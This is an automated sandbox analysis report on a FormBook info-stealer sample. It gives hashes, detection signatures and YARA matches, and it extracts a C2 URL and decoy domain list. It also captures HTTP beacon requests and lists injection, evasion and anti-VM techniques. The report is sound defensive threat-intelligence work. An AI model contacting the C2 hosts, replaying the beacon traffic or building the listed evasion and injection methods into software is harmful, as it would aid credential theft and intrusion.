Analysis Report ox87DNNM8d.exe

Overview

General Information

Sample Name: ox87DNNM8d.exe
Analysis ID: 411767
MD5: 41e38bcd6f5f3001c2e4f08ebcd2396c
SHA1: 2f3b2173d7a5a3a19e8a73d5fbfde7abc1836909
SHA256: 4e2b4396335fc6d3e6ff8c19b326f0f6342f537ba026ce1901d2122b2c7b3e4c
Infos:

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000003.00000002.280873290.0000000000400000.00000040.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.panda810.com/sve/"], "decoy": ["rockouqe.com", "secureproductsolutions.net", "josephserino.com", "operationstrategy.com", "umrohalfatih.com", "humanityenlightened.com", "taylorxgroup.com", "francescopetroni.net", "anaume-kun.com", "galleryalireza.com", "alimamavn.com", "tym0769.com", "trendselection.club", "warmupspod.com", "v-work.xyz", "aclmspecialmeeting2020.com", "youporn-live.net", "germinatebio.net", "hempnseeds.com", "ezfto.com", "pengruncapital.com", "voxitor.com", "hempdivasmag.com", "everydayleadershipinstitute.com", "biking-division.com", "livingstonemoments.com", "vstarfireworks.com", "abilitybrazil.com", "gixaa.com", "kp-dental.com", "developmentignited.com", "8155a.com", "petylook.com", "agrogroupkz.com", "germsbuzzter.com", "valley-bitcoin.com", "dcsdeliveryaz.website", "elitefriendlies.com", "pinoywebtools.com", "circuleather.com", "mioskinplus.info", "tamaraog.com", "maxfelicitavideo.com", "americacivics.com", "shebawatches.com", "meisammirhashemi.com", "nelivo.com", "real-dating-clubs2.com", "poishem.directory", "geminein.club", "soundalchemyadvanced.com", "kidswrtingpadstore.com", "cya-wonder.club", "tuqof.com", "showbizpr.com", "homo-nomad.com", "bcc-cbd.com", "papayacrisp.com", "paymentink.gold", "purejoyclothing.com", "newsadvices.com", "gungalmata.com", "viewsfromthedriversseat.com", "techriew.com"]}
Multi AV Scanner detection for submitted file
Source: ox87DNNM8d.exe Virustotal: Detection: 56% Perma Link
Source: ox87DNNM8d.exe Metadefender: Detection: 38% Perma Link
Source: ox87DNNM8d.exe ReversingLabs: Detection: 65%
Yara detected FormBook
Source: Yara match File source: 00000003.00000002.280873290.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.281369748.0000000001730000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.281290291.00000000015E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.493625427.0000000000AA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.234588732.0000000003F79000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.492941508.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.492525761.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 3.2.ox87DNNM8d.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.ox87DNNM8d.exe.400dbc8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.ox87DNNM8d.exe.400000.0.unpack, type: UNPACKEDPE
Antivirus or Machine Learning detection for unpacked file
Source: 3.2.ox87DNNM8d.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

barindex
Uses 32bit PE files
Source: ox87DNNM8d.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Source: ox87DNNM8d.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: systray.pdb source: ox87DNNM8d.exe, 00000003.00000002.281473750.0000000001808000.00000004.00000020.sdmp
Source: Binary string: systray.pdbGCTL source: ox87DNNM8d.exe, 00000003.00000002.281473750.0000000001808000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdbUGP source: ox87DNNM8d.exe, 00000003.00000003.233330947.0000000001900000.00000004.00000001.sdmp, systray.exe, 00000008.00000003.282590732.0000000000CC0000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb source: ox87DNNM8d.exe, 00000003.00000003.233330947.0000000001900000.00000004.00000001.sdmp, systray.exe

Software Vulnerabilities:

barindex
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 4x nop then pop edi 3_2_00416C6A
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 4x nop then pop edi 3_2_0040E42F
Source: C:\Windows\SysWOW64\systray.exe Code function: 4x nop then pop edi 8_2_0017E42F
Source: C:\Windows\SysWOW64\systray.exe Code function: 4x nop then pop edi 8_2_00186C6A

Networking:

barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.panda810.com/sve/
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /sve/?B6Ah=exmy3Nx7PpUJKJt1HtiGWNpuQz3EYRIgq3k+uiZc9JLQuvdlfCRkPG1S5SdPXsQAS6a5&8pW=2dUh0da HTTP/1.1Host: www.dcsdeliveryaz.websiteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /sve/?8pW=2dUh0da&B6Ah=pTnyDIvt+g7sdgQmMg9D2FnTPO22hVGFgxtUPmNZyFP4G/454L1vxjiDnOTVCmVO7LzE HTTP/1.1Host: www.americacivics.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /sve/?B6Ah=2mSxzHKvGhdVKk9ZF/49Uvkx+tNG2gtFJsc3MZrG0ttjvP+42CyBXtijrWDGJsqiNYNw&8pW=2dUh0da HTTP/1.1Host: www.vstarfireworks.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: DREAMHOST-ASUS DREAMHOST-ASUS
Source: Joe Sandbox View ASN Name: HKKFGL-AS-APHKKwaifongGroupLimitedHK HKKFGL-AS-APHKKwaifongGroupLimitedHK
Source: global traffic HTTP traffic detected: GET /sve/?B6Ah=exmy3Nx7PpUJKJt1HtiGWNpuQz3EYRIgq3k+uiZc9JLQuvdlfCRkPG1S5SdPXsQAS6a5&8pW=2dUh0da HTTP/1.1Host: www.dcsdeliveryaz.websiteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /sve/?8pW=2dUh0da&B6Ah=pTnyDIvt+g7sdgQmMg9D2FnTPO22hVGFgxtUPmNZyFP4G/454L1vxjiDnOTVCmVO7LzE HTTP/1.1Host: www.americacivics.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /sve/?B6Ah=2mSxzHKvGhdVKk9ZF/49Uvkx+tNG2gtFJsc3MZrG0ttjvP+42CyBXtijrWDGJsqiNYNw&8pW=2dUh0da HTTP/1.1Host: www.vstarfireworks.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: unknown DNS traffic detected: queries for: www.secureproductsolutions.net
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: no-storePragma: no-cacheContent-Type: text/htmlServer: IISX-Powered-By: WAF/2.0Date: Wed, 12 May 2021 05:07:40 GMTConnection: closeContent-Length: 1163Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"/><title>404 - </title><style type="text/css"><!--body{margin:0;font-si
Source: explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: ox87DNNM8d.exe, 00000001.00000002.234176049.0000000002F71000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmp String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Creates a DirectInput object (often for capturing keystrokes)
Source: ox87DNNM8d.exe, 00000001.00000002.233772608.0000000001240000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 00000003.00000002.280873290.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.281369748.0000000001730000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.281290291.00000000015E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.493625427.0000000000AA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.234588732.0000000003F79000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.492941508.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.492525761.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 3.2.ox87DNNM8d.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.ox87DNNM8d.exe.400dbc8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.ox87DNNM8d.exe.400000.0.unpack, type: UNPACKEDPE

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 00000003.00000002.280873290.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.280873290.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.281369748.0000000001730000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.281369748.0000000001730000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.281290291.00000000015E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.281290291.00000000015E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.493625427.0000000000AA0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.493625427.0000000000AA0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.234588732.0000000003F79000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.234588732.0000000003F79000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.492941508.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.492941508.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.492525761.0000000000170000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.492525761.0000000000170000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.ox87DNNM8d.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.ox87DNNM8d.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.ox87DNNM8d.exe.400dbc8.3.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.ox87DNNM8d.exe.400dbc8.3.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.ox87DNNM8d.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.ox87DNNM8d.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Contains functionality to call native functions
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 3_2_00419D50 NtCreateFile, 3_2_00419D50
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 3_2_00419E00 NtReadFile, 3_2_00419E00
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 3_2_00419E80 NtClose, 3_2_00419E80
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 3_2_00419F30 NtAllocateVirtualMemory, 3_2_00419F30
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 3_2_00419D4B NtCreateFile, 3_2_00419D4B
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 3_2_00419DFC NtReadFile, 3_2_00419DFC
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045D9840 NtDelayExecution,LdrInitializeThunk, 8_2_045D9840
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045D9860 NtQuerySystemInformation,LdrInitializeThunk, 8_2_045D9860
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045D9540 NtReadFile,LdrInitializeThunk, 8_2_045D9540
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045D9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 8_2_045D9910
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045D95D0 NtClose,LdrInitializeThunk, 8_2_045D95D0
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045D99A0 NtCreateSection,LdrInitializeThunk, 8_2_045D99A0
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045D9A50 NtCreateFile,LdrInitializeThunk, 8_2_045D9A50
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045D9650 NtQueryValueKey,LdrInitializeThunk, 8_2_045D9650
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045D9660 NtAllocateVirtualMemory,LdrInitializeThunk, 8_2_045D9660
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045D96D0 NtCreateKey,LdrInitializeThunk, 8_2_045D96D0
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045D96E0 NtFreeVirtualMemory,LdrInitializeThunk, 8_2_045D96E0
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045D9710 NtQueryInformationToken,LdrInitializeThunk, 8_2_045D9710
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045D9FE0 NtCreateMutant,LdrInitializeThunk, 8_2_045D9FE0
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045D9780 NtMapViewOfSection,LdrInitializeThunk, 8_2_045D9780
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045DB040 NtSuspendThread, 8_2_045DB040
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045D9820 NtEnumerateKey, 8_2_045D9820
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045D98F0 NtReadVirtualMemory, 8_2_045D98F0
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045D98A0 NtWriteVirtualMemory, 8_2_045D98A0
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045D9950 NtQueueApcThread, 8_2_045D9950
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045D9560 NtWriteFile, 8_2_045D9560
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045DAD30 NtSetContextThread, 8_2_045DAD30
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045D9520 NtWaitForSingleObject, 8_2_045D9520
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045D99D0 NtCreateProcessEx, 8_2_045D99D0
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045D95F0 NtQueryInformationFile, 8_2_045D95F0
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045D9670 NtQueryInformationProcess, 8_2_045D9670
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045D9610 NtEnumerateValueKey, 8_2_045D9610
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045D9A10 NtQuerySection, 8_2_045D9A10
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045D9A00 NtProtectVirtualMemory, 8_2_045D9A00
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045D9A20 NtResumeThread, 8_2_045D9A20
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045D9A80 NtOpenDirectoryObject, 8_2_045D9A80
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045D9770 NtSetInformationFile, 8_2_045D9770
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045DA770 NtOpenThread, 8_2_045DA770
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045D9760 NtOpenProcess, 8_2_045D9760
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045DA710 NtOpenProcessToken, 8_2_045DA710
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045D9B00 NtSetValueKey, 8_2_045D9B00
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045D9730 NtQueryVirtualMemory, 8_2_045D9730
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045DA3B0 NtGetContextThread, 8_2_045DA3B0
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045D97A0 NtUnmapViewOfSection, 8_2_045D97A0
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_00189D50 NtCreateFile, 8_2_00189D50
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_00189E00 NtReadFile, 8_2_00189E00
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_00189E80 NtClose, 8_2_00189E80
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_00189F30 NtAllocateVirtualMemory, 8_2_00189F30
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_00189D4B NtCreateFile, 8_2_00189D4B
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_00189DFC NtReadFile, 8_2_00189DFC
Detected potential crypto function
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 1_2_00B58782 1_2_00B58782
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 1_2_00B55D17 1_2_00B55D17
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 1_2_00B54765 1_2_00B54765
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 1_2_0160C1D0 1_2_0160C1D0
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 1_2_01609890 1_2_01609890
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 1_2_06420F30 1_2_06420F30
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 1_2_06427C80 1_2_06427C80
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 1_2_0642E228 1_2_0642E228
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 1_2_06420040 1_2_06420040
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 1_2_064280F8 1_2_064280F8
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 1_2_0642C1D8 1_2_0642C1D8
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 1_2_06429600 1_2_06429600
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 1_2_06421E18 1_2_06421E18
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 1_2_06421E28 1_2_06421E28
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 1_2_06420E38 1_2_06420E38
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 1_2_064236A9 1_2_064236A9
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 1_2_064236B8 1_2_064236B8
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 1_2_06427C72 1_2_06427C72
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 1_2_0642CC10 1_2_0642CC10
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 1_2_064234C8 1_2_064234C8
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 1_2_064234D8 1_2_064234D8
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 1_2_00B5B3F5 1_2_00B5B3F5
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 1_2_00B56759 1_2_00B56759
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 3_2_00401030 3_2_00401030
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 3_2_0041D21B 3_2_0041D21B
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 3_2_0041DBED 3_2_0041DBED
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 3_2_00409DEB 3_2_00409DEB
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 3_2_00402D87 3_2_00402D87
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 3_2_00402D90 3_2_00402D90
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 3_2_00409E30 3_2_00409E30
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 3_2_0041CF96 3_2_0041CF96
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 3_2_00402FB0 3_2_00402FB0
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 3_2_00FB5D17 3_2_00FB5D17
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 3_2_00FB8782 3_2_00FB8782
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 3_2_00FB4765 3_2_00FB4765
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 3_2_00FBB3F5 3_2_00FBB3F5
Source: C:\Users\user\Desktop\ox87DNNM8d.exe Code function: 3_2_00FB6759 3_2_00FB6759
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04651002 8_2_04651002
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045AB090 8_2_045AB090
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04661D55 8_2_04661D55
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_0459F900 8_2_0459F900
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_04590D20 8_2_04590D20
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_045B4120 8_2_045B4120
